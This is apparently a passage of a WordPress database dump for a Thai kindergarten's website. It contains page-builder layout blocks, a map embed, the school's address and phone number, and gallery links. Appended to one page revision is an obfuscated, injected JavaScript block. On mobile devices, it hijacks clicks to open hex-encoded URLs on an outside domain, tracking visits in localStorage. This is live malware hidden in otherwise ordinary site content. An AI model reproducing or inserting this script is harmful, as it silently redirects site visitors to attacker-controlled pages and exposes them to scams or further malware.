{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-27 21:07:44','2024-07-27 14:07:44','',19,'http://watprato.ssk.in.th/?p=58',0,'revision','',0),
(64,1,'2024-07-27 21:17:46','2024-07-27 14:17:46','','วันครู (1)','','inherit','open','closed','','%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%84%e0%b8%a3%e0%b8%b9-1','','','2024-07-27 21:17:46','2024-07-27 14:17:46','',19,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4',0,'attachment','video/mp4',0),
(65,1,'2024-07-27 21:17:50','2024-07-27 14:17:50','','VTR แนะนำโรงเรียน','','inherit','open','closed','','vtr-%e0%b9%81%e0%b8%99%e0%b8%b0%e0%b8%99%e0%b8%b3%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99','','','2024-07-27 21:17:50','2024-07-27 14:17:50','',19,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png',0,'attachment','image/png',0),
(66,1,'2024-07-27 21:18:02','2024-07-27 14:18:02','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"bcb37a0b\",\"mediaId\":40,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-bcb37a0b\"><img class=\"gb-image gb-image-bcb37a0b\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/434878811_122134783502202781_1764078122862278595_n.jpg\" alt=\"\" title=\"434878811_122134783502202781_1764078122862278595_n\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- 